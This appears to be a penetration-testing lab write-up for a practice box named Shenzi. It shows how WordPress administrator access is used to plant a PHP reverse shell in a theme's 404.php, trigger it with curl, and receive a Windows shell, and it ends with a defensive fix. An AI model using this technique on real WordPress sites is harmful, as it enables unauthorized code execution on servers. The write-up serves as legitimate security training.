WordPress RCE


With valid credentials for the WordPress admin account, the administrator role gives write access to the PHP files of the installed themes through the built-in editor, which is enough to run arbitrary PHP on the web server and turn the login into code execution.

In the dashboard, go to Appearance > Theme Editor, which lets an administrator edit the active theme's PHP files in place.

I will use the theme's 404.php and replace its contents with a PHP reverse shell payload pointing back at my listener. The 404 template is a convenient target because WordPress renders it for any request that does not resolve to an existing page, so the payload can be fired with a single request to a path that does not exist.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ curl -s http://$IP/shenzi/404.php
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ curl -s https://$IP/shenzi/404.php

Requesting the URL over HTTP and then HTTPS makes WordPress render the edited 404 template, and the listener receives the callback:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shenzi]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.167.55] 51528
SOCKET: Shell has connected! PID: 3144
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\shenzi> powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\xampp\htdocs\shenzi> whoami
shenzi\shenzi
PS C:\xampp\htdocs\shenzi> hostname
shenzi
PS C:\xampp\htdocs\shenzi> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.167.55
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.167.254

Initial foothold established on the target as the shenzi user by abusing WordPress administrator privileges (theme file editing) to execute arbitrary PHP. The shell runs with the privileges of the account that runs the XAMPP Apache service, which here is shenzi. Defensively, defining DISALLOW_FILE_EDIT as true in wp-config.php removes the theme and plugin editors and closes this route.